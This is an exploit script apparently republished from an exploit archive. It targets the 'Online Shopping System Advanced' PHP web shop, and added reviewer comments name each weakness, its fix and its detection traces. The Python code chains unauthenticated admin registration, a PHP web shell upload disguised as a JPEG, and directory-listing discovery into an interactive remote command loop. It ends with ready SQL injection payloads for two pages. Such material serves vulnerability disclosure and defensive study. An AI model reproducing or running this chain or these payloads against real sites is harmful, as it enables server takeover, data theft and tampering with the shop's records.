## https://sploitus.com/exploit?id=PACKETSTORM:190618
# Exploit Title: Online Shopping System Advanced - Remote Code Execution
# Date: 2025-03-11
# Exploit Author: bRpsd
# Contact: cy@live.no
# Zone-H: www.zone-h.org/archive/notifier=bRpsd
# Vendor: https://github.com/PuneethReddyHC/online-shopping-system-advanced/
# Version: 1.0 [latest]
# Tested on: MacOS XAMPP Darwin Kernel
# CVE : N/A
#
# Proof of concept that chains three application weaknesses (each step
# below names the weakness it depends on and the root-cause fix).
# NOTE(review): every "success" message is printed unconditionally -- no
# status code or response body is inspected before step 4 -- so the
# printed output is not evidence that a step actually worked.
import requests
import argparse
from bs4 import BeautifulSoup
import os  # NOTE(review): unused in this script

# One required argument: the target prefix that every path below is
# appended to. The paths start with "/", so a trailing slash on --url
# would produce "//" in the request URLs.
parser = argparse.ArgumentParser(description='Unauthenticated Privilege Escalation + Arbitrary File Upload = RCE ')
parser.add_argument('--url', required=True, help='Base URL of the application')
args = parser.parse_args()

# Define the base URL of the application
base_url = args.url

# Step 1: Registering an Admin User
# Weakness 1 (as the PoC assumes it): the admin registration form accepts a
# POST from a brand-new session with no prior authentication.
# Fix: admin accounts must not be self-registrable; gate account creation
# behind an authenticated administrator (or remove the endpoint).
# IR note: the fixed account name/email below are written to the
# application's admin table and are an indicator that this PoC was run.
register_url = f"{base_url}/admin/reg.php"
register_data = {
    "admin_name": "exploit_admin",
    "admin_email": "exploit_admin@example.com",
    "password_1": "password123",
    "password_2": "password123",
    "reg_user": "Register"
}

# Create a session to maintain cookies
# The same Session object carries the cookies from login into every later
# request, which is what makes steps 3-5 run under the created account.
session = requests.Session()

# Send the registration request
# NOTE(review): register_response is never checked; the message prints
# even if the server rejected the request.
register_response = session.post(register_url, data=register_data)
print("Admin created")

# Step 2: Login as Admin
# Logs in with the credentials just registered; the username field is
# the e-mail address from step 1.
login_url = f"{base_url}/admin/login.php"
login_data = {
    "admin_username": "exploit_admin@example.com",
    "password": "password123",
    "login_admin": "Log in"
}

# Send the login request
# NOTE(review): login_response is likewise never checked.
login_response = session.post(login_url, data=login_data)
print("Logged in as admin")

# Step 3: Upload a PHP Shell
# Weakness 2 (as the PoC assumes it): the product-edit upload keeps the
# client-supplied ".php" filename and trusts the client-declared
# Content-Type ("image/jpeg") instead of validating the file contents.
# Server-side handling is not visible here; the PoC only relies on it.
# Fix: allow-list extensions and verify the file is an image by content,
# rename on store, and serve uploads from a location where the web server
# does not execute scripts.
edit_product_url = f"{base_url}/admin/admin/edit_product.php?product_id=1"
php_shell = "<?php if(isset($_GET['cmd'])) { echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; } ?>"
files = {
    "picture": ("shell.php", php_shell, "image/jpeg")
}
upload_data = {
    "product_name": "Exploit Product",
    "details": "This is a test product",
    "price": "100",
    "product_type": "1",
    "brand": "1",
    "tags": "exploit",
    "btn_save": "Save"
}

# Send the file upload request
# Side effect on the target: this edits the product with product_id=1
# (name, details, price, type, brand, tags) in addition to storing the
# uploaded file. NOTE(review): upload_response is never checked.
upload_response = session.post(edit_product_url, data=upload_data, files=files)
print("Shell uploaded")

# Step 4: List files in the product_images directory
# Weakness 3: discovery of the stored filename depends on the web server
# returning a directory listing for /product_images/.
# Fix: disable automatic directory indexes for upload directories.
product_images_url = f"{base_url}/product_images/"
response = session.get(product_images_url)
soup = BeautifulSoup(response.text, 'html.parser')

# Find all links to files in the directory
# The first anchor whose href contains "shell.php" is taken as the stored
# path; the stored name is therefore expected to keep the uploaded name.
links = soup.find_all('a')
shell_path = None

for link in links:
    href = link.get('href')
    # NOTE(review): get('href') is None for an <a> without that attribute,
    # and `in` on None raises TypeError here.
    if 'shell.php' in href:
        shell_path = href
        break

if shell_path:
    # href is appended verbatim to the listing URL, so it is assumed to be
    # relative to /product_images/.
    shell_url = f"{product_images_url}{shell_path}"
    print(f"Shell URL: {shell_url}")

    # Step 5: Interact with the Shell
    def execute_command(command):
        """Send one command to the uploaded file via the ``cmd`` query
        parameter and return the raw response body.

        Detection note: each call produces a GET to the stored .php file
        under /product_images/ with a ``cmd`` parameter, which is visible
        in web server access logs.
        """
        response = session.get(shell_url, params={"cmd": command})
        return response.text

    # Example of executing commands
    # Interactive loop; "exit" or "quit" (case-insensitive) ends it.
    while True:
        cmd = input("command: ")
        if cmd.lower() in ['exit', 'quit']:
            break
        output = execute_command(cmd)
        print(output)
else:
    print("Shell location not found.")

# Author's notes on additional SQL injection points. These are reported
# findings only -- nothing below is exercised by this script.
# Fix: use parameterized queries for the p and cat_id parameters.
# There's also an SQLi in multiple parts of the script such as 
# /product.php?p=71
# /products.php?cat_id=6
# Parameter: p (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: p=73%' AND 2717=2717#
# Type: error-based
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
# Payload: p=-8485%' OR 1 GROUP BY CONCAT(0x717a6a6b71,(SELECT (CASE WHEN (7151=7151) THEN 1 ELSE 0 END)),0x716a6b7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
#
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: p=73%' AND (SELECT 2579 FROM (SELECT(SLEEP(5)))bYFm) AND 'Wgsl%'='Wgsl
#
#Type: UNION query
#Title: MySQL UNION query (NULL) - 10 columns
#Payload: p=73%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a6a6b71,0x574f756e6670686a636b76776b5973734d7a434e634a6e66746c704946477a7068656e7a64544e54,0x716a6b7871),NULL,NULL,NULL,NULL,NULL#